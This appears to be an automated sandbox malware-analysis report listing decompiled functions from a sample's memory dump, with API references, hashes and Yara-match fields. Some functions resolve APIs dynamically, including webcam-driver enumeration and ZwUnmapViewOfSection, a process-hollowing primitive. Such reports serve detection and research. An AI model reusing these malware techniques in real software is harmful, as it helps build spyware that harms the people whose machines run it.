				_t5 = GetProcAddress(LoadLibraryA("AVICAP32.dll"), "capGetDriverDescriptionA");
				return  *_t5(_t7, _t13, _t12, _a8, _a4);
			}







                                    0x2402190a
                                    0x2402190c
                                    0x2402190e
                                    0x24021920
                                    0x24021936

                                    APIs
                                    • LoadLibraryA.KERNEL32(AVICAP32.dll,capGetDriverDescriptionA), ref: 2402191A
                                    • GetProcAddress.KERNEL32(00000000,AVICAP32.dll), ref: 24021920
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: AVICAP32.dll$capGetDriverDescriptionA
                                    • API String ID: 2574300362-2465018903
                                    • Opcode ID: b7777b4aadb4f6028b8c85780a9cdfe0e4b1d64e7fd81efaa68bd6439109a5b2
                                    • Instruction ID: c1a5b6ee841e59ece0fcda65be3f0267a116aeb9b81956fcb4f5259b0698455e
                                    • Opcode Fuzzy Hash: b7777b4aadb4f6028b8c85780a9cdfe0e4b1d64e7fd81efaa68bd6439109a5b2
                                    • Instruction Fuzzy Hash: 35D0C2722005183B2311E5DB9C80C9BAB5CDFE55B03008026B50C9B109C4308E4082F0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24016E48, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E24016E48(void* __eax, void* __edx) {
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __edx;
				_t5 = __eax;
				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetSystemDirectoryA");
				return  *_t3(_t5, _t7);
			}






                                    0x24016e4a
                                    0x24016e4c
                                    0x24016e5e
                                    0x24016e69

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetSystemDirectoryA,?,?,24016F52,00000000,24016F93), ref: 24016E58
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 24016E5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-261809815
                                    • Opcode ID: 197bffbdcfab9a08931bd0fd53a7bf40fe8beca8f618e0b877edb162fd92ae0d
                                    • Instruction ID: f79111351f4f29a60c0ed489d4cadc496980b09f06a717a2ee69e90e3a02e595
                                    • Opcode Fuzzy Hash: 197bffbdcfab9a08931bd0fd53a7bf40fe8beca8f618e0b877edb162fd92ae0d
                                    • Instruction Fuzzy Hash: 6AC09B916416203B772175F69CD4D9F49CCCF754A73000951B51DE7109D5554F9445F0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24016E90, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E24016E90(void* __eax, void* __edx) {
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __edx;
				_t5 = __eax;
				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetWindowsDirectoryA");
				return  *_t3(_t5, _t7);
			}






                                    0x24016e92
                                    0x24016e94
                                    0x24016ea6
                                    0x24016eb1

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetWindowsDirectoryA,?,?,24016FDE,00000000,2401701F,?,?,?,24017083,?,00000000,240170AB,?,00000000), ref: 24016EA0
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 24016EA6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetWindowsDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-157430550
                                    • Opcode ID: 59df834a10cddf2c29c478307119b66ab06276fc2779e5b1ffebab53116b2117
                                    • Instruction ID: 69e423403ef4282cd4729c24c3e84ac7ba167edddffb2b0f441e944d1634d2f2
                                    • Opcode Fuzzy Hash: 59df834a10cddf2c29c478307119b66ab06276fc2779e5b1ffebab53116b2117
                                    • Instruction Fuzzy Hash: BEC09B91542A203B772176F65CD4D9F45CCCF654AB3000951751CE710D95554F9405F0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24016EDC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E24016EDC(void* __eax, void* __edx) {
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __edx;
				_t5 = __eax;
				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetTempPathA");
				return  *_t3(_t5, _t7);
			}






                                    0x24016ede
                                    0x24016ee0
                                    0x24016ef2
                                    0x24016efd

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetTempPathA,?,?,2401704D,2405B9C4,24038300,00000000,240384A4,?,?,?,?,00000000,00000000), ref: 24016EEC
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 24016EF2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetTempPathA$kernel32.dll
                                    • API String ID: 2574300362-3269217876
                                    • Opcode ID: 8b31929f9156381729f56c6ad0dbad8b89804d8e2854d8055e5027ff43aebcb1
                                    • Instruction ID: 0a871112e5dd9aca3d2892633fa1dc1232e52f3e44dda2d8d3762dc74d7bcea7
                                    • Opcode Fuzzy Hash: 8b31929f9156381729f56c6ad0dbad8b89804d8e2854d8055e5027ff43aebcb1
                                    • Instruction Fuzzy Hash: 39C022A2202A203B3B2022FA0CC0EAF008CCFAA0EB3000C22B00CE300EC8000F80A0F0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2405493C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E2405493C(void* __eax, void* __edx) {
				_Unknown_base(*)()* _t3;
				void* _t5;
				void* _t7;

				_t7 = __edx;
				_t5 = __eax;
				_t3 = GetProcAddress(LoadLibraryA("ntdll.dll"), "ZwUnmapViewOfSection");
				return  *_t3(_t5, _t7);
			}






                                    0x2405493e
                                    0x24054940
                                    0x24054952
                                    0x2405495d

                                    APIs
                                    • LoadLibraryA.KERNEL32(ntdll.dll,ZwUnmapViewOfSection,?,00000000,24054A7E,?,?,?,00000004,?,?,00010002), ref: 2405494C
                                    • GetProcAddress.KERNEL32(00000000,ntdll.dll), ref: 24054952
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: ZwUnmapViewOfSection$ntdll.dll
                                    • API String ID: 2574300362-452462277
                                    • Opcode ID: e6caed4441b83b8dffbebf7ee7281ca08b372e55f43b90c5923dc58739cf91a3
                                    • Instruction ID: 3119d6937e67e5c3c765ca51a2b871a850d8a193896bf884af7ec162b7cbed31
                                    • Opcode Fuzzy Hash: e6caed4441b83b8dffbebf7ee7281ca08b372e55f43b90c5923dc58739cf91a3
                                    • Instruction Fuzzy Hash: D3C09B916516243B7721E7FA1CD5FDF454CDFE50A73010451751CF711995545F8445F0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24015E80, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 11libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E24015E80(void* __eax) {
				_Unknown_base(*)()* _t3;
				void* _t5;

				_t5 = __eax;
				_t3 = GetProcAddress(LoadLibraryA("shell32.dll"), "SHFileOperationA");
				return  *_t3(_t5);
			}





                                    0x24015e81
                                    0x24015e93
                                    0x24015e9c

                                    APIs
                                    • LoadLibraryA.KERNEL32(shell32.dll,SHFileOperationA), ref: 24015E8D
                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 24015E93
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: SHFileOperationA$shell32.dll
                                    • API String ID: 2574300362-1445012119
                                    • Opcode ID: 447a24b3402ff76623f1e0fd2d05e5a5d3ef6306e5fc51edb743bd2441ac0ba2
                                    • Instruction ID: 54800464fafc3b15a065d511688907e864eed5678d08cab56e15401a55656e58
                                    • Opcode Fuzzy Hash: 447a24b3402ff76623f1e0fd2d05e5a5d3ef6306e5fc51edb743bd2441ac0ba2
                                    • Instruction Fuzzy Hash: 84B092A09416102E671526F24CD0E1E008D5F640073800400300CEE00989245B840460
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24042750, Relevance: 6.1, APIs: 4, Instructions: 81sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 54%
                                    			E24042750(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _t13;
				struct HWND__* _t32;
				intOrPtr _t38;
				struct HWND__* _t48;
				intOrPtr _t51;

				_push(0);
				_push(0);
				_push(_t51);
				_push(0x24042867);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51;
				Sleep(0x1f4);
				while( *0x2405aaa4 == 0) {
					_t13 =  *0x2405ab60; // 0x2405ca4c
					if( *((char*)( *_t13 + 0x10)) == 1) {
						__eflags =  *0x240632d4;
						if( *0x240632d4 != 0) {
							__eflags =  *0x2406328c;
							if(__eflags != 0) {
								E2403FA38( *0x24063290,  &_v12, __eflags);
								_push(_v12);
								_push( *0x240632a4);
								_push(0x24042880);
								_push( *0x240632ac);
								_push(0x2404288c);
								_push( *0x240632d4);
								_push(0x2404288c);
								_push(0x2404288c);
								E240133FC();
								E2403FA84( *0x24063290, 0x2406328c, _v8, __eflags);
								E24013088(0x240632d4);
								E2403FC3C( *0x24063290, E2403FC50( *0x24063290));
								E2403F108( *0x2406328c);
								SetWindowPos( *( *0x2406328c + 4), 0xffffffff, 0, 0, 0, 0, 0x13);
								_t32 = GetForegroundWindow();
								_t48 =  *( *0x2406328c + 4);
								__eflags = _t32 - _t48;
								if(_t32 != _t48) {
									SetForegroundWindow(_t48);
								}
							}
						}
						E24038298();
						continue;
					}
					break;
				}
				_pop(_t38);
				 *[fs:eax] = _t38;
				_push(0x2404286e);
				return E240130AC( &_v12, 2);
			}










                                    0x24042753
                                    0x24042755
                                    0x24042766
                                    0x24042767
                                    0x2404276c
                                    0x2404276f
                                    0x24042777
                                    0x24042832
                                    0x2404283b
                                    0x24042846
                                    0x24042781
                                    0x24042788
                                    0x2404278e
                                    0x24042791
                                    0x2404279c
                                    0x240427a1
                                    0x240427a4
                                    0x240427aa
                                    0x240427af
                                    0x240427b5
                                    0x240427ba
                                    0x240427c0
                                    0x240427c5
                                    0x240427d2
                                    0x240427dc
                                    0x240427e6
                                    0x240427f6
                                    0x240427fd
                                    0x24042814
                                    0x24042819
                                    0x24042820
                                    0x24042823
                                    0x24042825
                                    0x24042828
                                    0x24042828
                                    0x24042825
                                    0x24042791
                                    0x2404282d
                                    0x00000000
                                    0x2404282d
                                    0x00000000
                                    0x24042846
                                    0x2404284e
                                    0x24042851
                                    0x24042854
                                    0x24042866

                                    APIs
                                    • Sleep.KERNEL32(000001F4,00000000,24042867,?,?,?,?,00000000,00000000), ref: 24042777
                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000013,2404288C,2404288C,2404288C,24042880,?,000001F4,00000000,24042867), ref: 24042814
                                    • GetForegroundWindow.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000013,2404288C,2404288C,2404288C,24042880,?,000001F4,00000000,24042867), ref: 24042819
                                    • SetForegroundWindow.USER32(?), ref: 24042828
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Window$Foreground$Sleep
                                    • String ID:
                                    • API String ID: 1564942233-0
                                    • Opcode ID: e42c2df37c330b6a537cce6ee8f11ed2d94958caf468d346dcf3183a4a4f598c
                                    • Instruction ID: 04208953aa781ba4e3a2c7b4420c7feabd7af59f5d778525f18bc28e7f8a41ff
                                    • Opcode Fuzzy Hash: e42c2df37c330b6a537cce6ee8f11ed2d94958caf468d346dcf3183a4a4f598c
                                    • Instruction Fuzzy Hash: DC216834B01202AFFB11DB55C890F4DBFA4EB19764F6041B8F901AB29CCBB4A9C4CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403D15C, Relevance: 6.1, APIs: 4, Instructions: 79registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E2403D15C(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				int _v16;
				int _v20;
				char _v24;
				void* _t56;
				intOrPtr _t65;
				void* _t67;
				char* _t68;
				void* _t73;
				void* _t75;

				_t75 = __eflags;
				_v24 = 0;
				_t56 = __ecx;
				_v8 = __edx;
				_t67 = __eax;
				_t70 = _a4;
				_push(_t73);
				_push(0x2403d228);
				_push( *[fs:eax]);
				 *[fs:eax] = _t73 + 0xffffffec;
				RegOpenKeyExA(_t67, E24013534(_v8), 0, 1,  &_v12);
				_v16 = 0;
				_t68 = E24013534(_t56);
				RegQueryValueExA(_v12, _t68, 0,  &_v16, 0,  &_v20);
				E24013174( &_v24, _v20, 0, _t75);
				RegQueryValueExA(_v12, _t68, 0,  &_v16, E24013534(_v24),  &_v20);
				E24013274(_a4, E24013534(_v24));
				RegCloseKey(_v12);
				E24013274(_t70, E24013534(_v24));
				_pop(_t65);
				 *[fs:eax] = _t65;
				_push(0x2403d22f);
				return E24013088( &_v24);
			}














                                    0x2403d15c
                                    0x2403d167
                                    0x2403d16a
                                    0x2403d16c
                                    0x2403d16f
                                    0x2403d171
                                    0x2403d176
                                    0x2403d177
                                    0x2403d17c
                                    0x2403d17f
                                    0x2403d194
                                    0x2403d19b
                                    0x2403d1b1
                                    0x2403d1b8
                                    0x2403d1c5
                                    0x2403d1e2
                                    0x2403d1f3
                                    0x2403d1fc
                                    0x2403d20d
                                    0x2403d214
                                    0x2403d217
                                    0x2403d21a
                                    0x2403d227

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00000001,?,00000000,2403D228), ref: 2403D194
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,?,00000000,2403D228), ref: 2403D1B8
                                    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001), ref: 2403D1E2
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 2403D1FC
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: QueryValue$CloseOpen
                                    • String ID:
                                    • API String ID: 1586453840-0
                                    • Opcode ID: 2335294db028b5f2f38bfc0fd452b5abab27d5df04ec84b0eb78c111557e705a
                                    • Instruction ID: 979a03369db9fc66bd0eb84d1f3c609785e04e46149c97d7ff5c563cf495da0b
                                    • Opcode Fuzzy Hash: 2335294db028b5f2f38bfc0fd452b5abab27d5df04ec84b0eb78c111557e705a
                                    • Instruction Fuzzy Hash: BE21E7B5A00148AFFF00EBA9DD81EAFBBFCEF68644F504465B508F7254DA749E408B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2402435C, Relevance: 6.1, APIs: 4, Instructions: 69memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E2402435C(void** _a4) {
				signed int _v8;
				char _v12;
				void* _t25;
				void* _t28;
				struct HINSTANCE__* _t36;
				void* _t39;
				void* _t45;
				void** _t47;
				signed int _t54;

				_t47 = _a4;
				_t39 =  *_t47;
				if(_t39 != 0 &&  *((char*)(_t39 + 0x10)) != 0) {
					_t45 =  *(_t39 + 4);
					 *((intOrPtr*)( *((intOrPtr*)( *_t39 + 0x28)) + _t45))(_t45, 0, 0);
					 *((char*)(_t39 + 0x10)) = 0;
					_t25 =  *((intOrPtr*)(_t39 + 0xc)) - 1;
					if(_t25 >= 0) {
						_v12 = _t25 + 1;
						_v8 = 0;
						do {
							_t54 = _v8 << 2;
							 *((intOrPtr*)(_t39 + 8)) =  *((intOrPtr*)(_t39 + 8)) + _t54;
							_t36 =  *( *( *_t47 + 8));
							if(_t36 != 0xffffffff) {
								FreeLibrary(_t36);
							}
							 *((intOrPtr*)(_t39 + 8)) =  *((intOrPtr*)(_t39 + 8)) - _t54;
							_v8 = _v8 + 1;
							_t17 =  &_v12;
							 *_t17 = _v12 - 1;
						} while ( *_t17 != 0);
					}
					E24014B28( *((intOrPtr*)(_t39 + 8)));
					_t28 =  *(_t39 + 4);
					if(_t28 != 0) {
						VirtualFree(_t28, 0, 0x8000);
					}
					HeapFree(GetProcessHeap(), 0,  *_t47);
					 *_t47 = 0;
				}
				return 0;
			}












                                    0x24024365
                                    0x24024368
                                    0x2402436c
                                    0x24024381
                                    0x2402438d
                                    0x2402438f
                                    0x24024396
                                    0x24024399
                                    0x2402439c
                                    0x2402439f
                                    0x240243a6
                                    0x240243a9
                                    0x240243ac
                                    0x240243b4
                                    0x240243b9
                                    0x240243bc
                                    0x240243bc
                                    0x240243c1
                                    0x240243c4
                                    0x240243c7
                                    0x240243c7
                                    0x240243c7
                                    0x240243a6
                                    0x240243d0
                                    0x240243d6
                                    0x240243db
                                    0x240243e5
                                    0x240243e5
                                    0x240243f5
                                    0x240243fc
                                    0x240243fc
                                    0x24024404

                                    APIs
                                    • FreeLibrary.KERNEL32(?), ref: 240243BC
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 240243E5
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 240243EF
                                    • HeapFree.KERNEL32(00000000,00000000,?), ref: 240243F5
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Free$Heap$LibraryProcessVirtual
                                    • String ID:
                                    • API String ID: 548792435-0
                                    • Opcode ID: 327151f7bebc56f7355ee985beca54bda8cd7dd0ae24fdd1ad7be8b3eac1ed1b
                                    • Instruction ID: f97f3103f5dbf574c2b392118eac2456a7830a3e3d6531ac7e242cdaadc44754
                                    • Opcode Fuzzy Hash: 327151f7bebc56f7355ee985beca54bda8cd7dd0ae24fdd1ad7be8b3eac1ed1b
                                    • Instruction Fuzzy Hash: 42114F71A04615AFEB10DFA8C8C0B0AB7E8EF54724F244195E91CEF2D5D770E994CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24041684, Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 93%
                                    			E24041684(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x2405b67c; // 0x24010000
				 *0x2405aa6c = _t6;
				_t8 =  *0x2405aa80; // 0x240415a0
				_t9 =  *0x2405b67c; // 0x24010000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L24015258 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x2405b67c; // 0x24010000
						_t20 =  *0x2405aa80; // 0x240415a0
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x2405aa5c);
				}
				_t13 =  *0x2405b67c; // 0x24010000
				_t24 =  *0x2405aa80; // 0x240415a0
				_t22 = E240154D4(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E240415D8(_a4, _a8));
				}
				return _t22;
			}














                                    0x2404168b
                                    0x24041690
                                    0x24041699
                                    0x2404169f
                                    0x240416a5
                                    0x240416ad
                                    0x240416af
                                    0x240416b2
                                    0x240416c0
                                    0x240416c2
                                    0x240416c8
                                    0x240416ce
                                    0x240416ce
                                    0x240416d8
                                    0x240416d8
                                    0x240416ee
                                    0x240416fb
                                    0x2404170b
                                    0x24041712
                                    0x24041723
                                    0x24041723
                                    0x2404172e

                                    APIs
                                    • GetClassInfoA.USER32(24010000,240415A0,?), ref: 240416A5
                                    • UnregisterClassA.USER32(240415A0,24010000), ref: 240416CE
                                    • RegisterClassA.USER32(2405AA5C), ref: 240416D8
                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 24041723
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                    • String ID:
                                    • API String ID: 4025006896-0
                                    • Opcode ID: 058516e327051851eaa92d68fbdbc3567e5a5302a41ef786f86185bc7bd79c04
                                    • Instruction ID: 5d6d12c1c5f1638e54d88e172aeff26ace834c3fa088445d8c6e8abfa3585253
                                    • Opcode Fuzzy Hash: 058516e327051851eaa92d68fbdbc3567e5a5302a41ef786f86185bc7bd79c04
                                    • Instruction Fuzzy Hash: C00152B1A44104ABEB41DFA9CC84E9A77ACF718109F108230F919FF284DA79DDC48B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24053B80, Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 93%
                                    			E24053B80(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x2405b67c; // 0x24010000
				 *0x2405aad4 = _t6;
				_t8 =  *0x2405aae8; // 0x24053ab0
				_t9 =  *0x2405b67c; // 0x24010000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L24015258 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x2405b67c; // 0x24010000
						_t20 =  *0x2405aae8; // 0x24053ab0
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x2405aac4);
				}
				_t13 =  *0x2405b67c; // 0x24010000
				_t24 =  *0x2405aae8; // 0x24053ab0
				_t22 = E240154D4(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E24053AE8(_a4, _a8));
				}
				return _t22;
			}














                                    0x24053b87
                                    0x24053b8c
                                    0x24053b95
                                    0x24053b9b
                                    0x24053ba1
                                    0x24053ba9
                                    0x24053bab
                                    0x24053bae
                                    0x24053bbc
                                    0x24053bbe
                                    0x24053bc4
                                    0x24053bca
                                    0x24053bca
                                    0x24053bd4
                                    0x24053bd4
                                    0x24053bea
                                    0x24053bf7
                                    0x24053c07
                                    0x24053c0e
                                    0x24053c1f
                                    0x24053c1f
                                    0x24053c2a

                                    APIs
                                    • GetClassInfoA.USER32(24010000,24053AB0,?), ref: 24053BA1
                                    • UnregisterClassA.USER32(24053AB0,24010000), ref: 24053BCA
                                    • RegisterClassA.USER32(2405AAC4), ref: 24053BD4
                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 24053C1F
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                    • String ID:
                                    • API String ID: 4025006896-0
                                    • Opcode ID: 722f483689c92c6ae43707a2b06e8fc22369b5ad556702ef704db49b336cde16
                                    • Instruction ID: 96c510306755618a1fd3a9f6c96d9ab3ab95adeedde68d798eea49e8bbd1af27
                                    • Opcode Fuzzy Hash: 722f483689c92c6ae43707a2b06e8fc22369b5ad556702ef704db49b336cde16
                                    • Instruction Fuzzy Hash: A30148B1604204ABEB00DF6CCD90F9E77ADF71D119F508621F618EB294DA79D8D58750
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2405219C, Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 65%
                                    			E2405219C(intOrPtr __eax, void* __ebx, long __ecx, char __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				long _v16;
				void* _t28;
				intOrPtr _t33;
				long _t36;
				void* _t39;

				_t36 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E24013524(_v8);
				E24013524(_v12);
				_push(_t39);
				_push(0x24052231);
				_push( *[fs:eax]);
				 *[fs:eax] = _t39 + 0xfffffff4;
				_t28 = CreateFileA(E24013534(_v8), 0x40000000, 2, 0, 3, 0, 0);
				if(_t28 != 0xffffffff) {
					SetFilePointer(_t28, 0, 0, 2);
					WriteFile(_t28, E24013588( &_v12), _t36,  &_v16, 0);
					CloseHandle(_t28);
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E24052238);
				return E240130AC( &_v12, 2);
			}










                                    0x240521a4
                                    0x240521a6
                                    0x240521a9
                                    0x240521af
                                    0x240521b7
                                    0x240521be
                                    0x240521bf
                                    0x240521c4
                                    0x240521c7
                                    0x240521e7
                                    0x240521ec
                                    0x240521f5
                                    0x2405220b
                                    0x24052211
                                    0x24052211
                                    0x24052218
                                    0x2405221b
                                    0x2405221e
                                    0x24052230

                                    APIs
                                    • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000003,00000000,00000000,00000000,24052231,?,2406330C,00000000), ref: 240521E2
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000,00000000,00000000,24052231,?,2406330C,00000000), ref: 240521F5
                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 2405220B
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000002,00000000,40000000,00000002,00000000,00000003,00000000), ref: 24052211
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
